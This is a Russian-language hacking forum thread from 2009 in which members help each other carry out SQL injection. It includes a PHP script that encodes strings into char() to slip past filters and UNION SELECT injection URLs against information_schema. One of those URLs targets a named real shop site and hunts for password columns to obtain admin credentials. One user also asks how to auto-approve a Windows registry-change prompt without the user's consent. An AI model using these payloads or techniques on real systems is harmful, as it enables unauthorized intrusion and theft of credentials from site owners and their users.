Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Если 3 и 4 поля принтабельные - верно
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Ой, сорри, 123
     
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    PHP:
    <?php  
    function form(){ 
    echo 
    "<hr>"
    echo 
    "<form action=? method=GET>"
    echo 
    "Word:<input name=string type=text>"
    echo 
    "<input type=submit value=OK>"
    echo 
    "</form>"

    if (!isset(
    $_GET['string'])){ 
    form(); 
    exit; 

    $string=$_GET['string']; 
    for (
    $i=0;$i<strlen($string);$i++){ 
    $str_arr[$i]=substr($string,$i,1); 

    $result=''
    for (
    $i=0;$i<count($str_arr);$i++){ 
    if (
    $i==count($str_arr)-1){ 
    $result=$result.ord($str_arr[$i]); 
    }else{ 
    $result=$result.ord($str_arr[$i]).","


    echo 
    "<textarea>char(".$result.")</textarea>"
    form(); 
    ?>
    Вот, накатал быстро, если еще кому-то надо, энкодит слово в чар.
     
  4. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    mailbrush, в разных диалектах SQL по разному применяется функция CHAR... Так же в разных диалектах по разному используется операция "конкатенация", поэтому возможно ещё варианты... Хорошо, если бы ты ещё предусмотрел переключатель - MySQL, MSSQL, Oracle... Цены бы тебе не было!
     
  5. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    К чему ещё один "велосипед"?
    К тому же, пару страниц назад Sabe скинул ссылку на сайт, который "энкодит слово в чар", причем можно энкодить как для MySQL, так и для MSSQL и Oracle.
     
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Посмотрим.. Это для мускуля было.
     
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Это гуд, не искал, знач мну писать не надо, но для себя потренируюсь.
     
    3 people like this.
  8. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    идиотством страдаю,пока на все 100% не закреплю ,дальше не пойду)
    http://localhost/view_cat.php?cat=-1+union+select+1,column_name,3,4,5,6,7,8,9+from+information_schema.columns+where+column_name=char(97,100,100,101,100,114,101,113,117,101,115,116,115)+limit+1,1
    Точно знаю, что в таблице есть строки
    addedrequests-название таблицы

    но выводит,что запрос прошел,однако данных нет!
     
    #4928 kevmen, 23 Jan 2009
    Last edited: 23 Jan 2009
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    kevmen А может всё-же почитать что-то нужно? Статьи ведь пишут не для того, что-бы сдесь их по новой всем индивидуально перессказывать


    http://localhost/view_cat.php?cat=-1+union+select+1,column_name,3,4,5,6,7,8,9+from+in formation_schema.columns+where+column_name=char(97 ,100,100,101,100,114,101,113,117,101,115,116,115)+ limit+1,1

    Столбец, из шемы, где столбец. Видимо ты хотел написать, +where+table_name='имя_таблицы'
     
    #4929 Kakoytoxaker, 23 Jan 2009
    Last edited: 23 Jan 2009
    1 person likes this.
  10. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    jokester
    ЧитаЛ
    Читаю вот
    https://forum.antichat.ru/showpost.php?p=1051237&postcount=4597
    и вот
    http://forum.antichat.ru/thread43966.html
     
  11. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    kevmen
    переведи свой запрос, у тебя получается вывести названия строк где имя строки char(97 ,100,100,101,100,114,101,113,117,101,115,116,115), а тебе надо вывести названия строк, где имя таблицы char(97 ,100,100,101,100,114,101,113,117,101,115,116,115)
     
  12. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    jokester,спасибо)Опять ступил
     
  13. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Помогите найти админские таблицы, плз, запарился уже...
    В Users админа нет...
     
    #4933 Gemini12, 23 Jan 2009
    Last edited: 23 Jan 2009
    1 person likes this.
  14. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    попробуй составить запрос типа http://www.technodom.kz/index.php?go=news&news=1+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+where+column_name+like+char(37,112,97,115,115,37)&q=wNW616thoUBWHv3
    запрос типа вывести все строки, где имеется словосочетание pass, попробуй вместо pass подставить login, name итд...
     
    1 person likes this.
  15. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Не выходит :(
    Скорее всего админ хранит пассы в другой бд, кто знает подскажите как определить в какой и как туда попасть?
     
  16. Neponomat

    Neponomat New Member

    Joined:
    23 Jan 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Всем привет!
    Я чайник, даже самовар :) большая просьба ко всем кто в курсе, ответить
    Можно ли сделать так, что во время появления на экране окошка с предложением изменения реестра да - нет, запустить программу, которая сама нажмёт кнопку да, как только появиться это окно :) проще говоря, чтобы запись в реестр проходила без запроса у пользователя.
    Можно так или нет? Если да то как??
     
  17. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    Gemini12,попробуй выведи все таблицы сиптом)может найдешь что-нибудь )
     
  18. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    Neponomat,если бы так можно было,тогда зачем фаэрволы?зачем нам надежные браузеры!
     
  19. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    попробуй так
    table_name=любая стандартная таблица
    должна вывести имя бд где находиться стандартная таблица COLLATIONS,
    P.s если есть фильтры имя таблицы напиши в hex'e
     
    #4939 pinky07, 23 Jan 2009
    Last edited: 23 Jan 2009
  20. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    pinky07,
    Ты с ума сошёл? Ты сейчас его только запутаешь...

    Gemini12,
    Ничего кроме users не нашел, видимо, не судьба.
     
    #4940 R1dex, 23 Jan 2009
    Last edited: 23 Jan 2009
    1 person likes this.
Thread Status:
Not open for further replies.